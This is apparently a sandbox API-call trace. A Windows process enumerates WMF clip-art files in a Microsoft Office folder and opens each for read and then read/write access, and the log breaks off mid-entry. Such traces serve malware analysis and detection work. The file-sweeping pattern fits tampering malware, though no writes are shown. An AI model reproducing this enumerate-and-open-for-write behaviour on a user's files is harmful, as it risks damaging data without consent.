FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00705_.WMF", cAlternateFileName="")) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] AreFileApisANSI () returned 1 [0103.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] AreFileApisANSI () returned 1 [0103.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.920] GetFileType (hFile=0x368) returned 0x1 [0103.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.920] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.920] CloseHandle (hObject=0x368) returned 1 [0103.920] AreFileApisANSI () returned 1 [0103.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.920] GetFileType (hFile=0x368) returned 0x1 [0103.921] CloseHandle (hObject=0x368) returned 1 [0103.921] AreFileApisANSI () returned 1 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.921] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x600c)) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01015_.WMF", cAlternateFileName="")) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] AreFileApisANSI () returned 1 [0103.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.921] AreFileApisANSI () returned 1 [0103.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.921] GetFileType (hFile=0x368) returned 0x1 [0103.922] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.922] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.922] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.922] CloseHandle (hObject=0x368) returned 1 [0103.922] AreFileApisANSI () returned 1 [0103.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.922] GetFileType (hFile=0x368) returned 0x1 [0103.922] CloseHandle (hObject=0x368) returned 1 [0103.923] AreFileApisANSI () returned 1 [0103.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.923] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01015_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b2)) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39e4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01039_.WMF", cAlternateFileName="")) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] AreFileApisANSI () returned 1 [0103.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.923] AreFileApisANSI () returned 1 [0103.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.923] GetFileType (hFile=0x368) returned 0x1 [0103.923] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.924] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.924] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.924] CloseHandle (hObject=0x368) returned 1 [0103.924] AreFileApisANSI () returned 1 [0103.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.924] GetFileType (hFile=0x368) returned 0x1 [0103.924] CloseHandle (hObject=0x368) returned 1 [0103.924] AreFileApisANSI () returned 1 [0103.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.924] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39e4)) returned 1 [0103.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.925] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01138_.WMF", cAlternateFileName="")) returned 1 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] AreFileApisANSI () returned 1 [0104.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.043] AreFileApisANSI () returned 1 [0104.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.044] GetFileType (hFile=0x33c) returned 0x1 [0104.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.044] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.044] CloseHandle (hObject=0x33c) returned 1 [0104.044] AreFileApisANSI () returned 1 [0104.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.044] GetFileType (hFile=0x33c) returned 0x1 [0104.045] CloseHandle (hObject=0x33c) returned 1 [0104.045] AreFileApisANSI () returned 1 [0104.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.045] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe6c)) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD01139_.WMF", cAlternateFileName="")) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] AreFileApisANSI () returned 1 [0104.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.045] AreFileApisANSI () returned 1 [0104.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.045] GetFileType (hFile=0x33c) returned 0x1 [0104.046] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.046] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.046] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.046] CloseHandle (hObject=0x33c) returned 1 [0104.046] AreFileApisANSI () returned 1 [0104.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.046] GetFileType (hFile=0x33c) returned 0x1 [0104.046] CloseHandle (hObject=0x33c) returned 1 [0104.047] AreFileApisANSI () returned 1 [0104.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0104.047] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe30)) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.047] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, 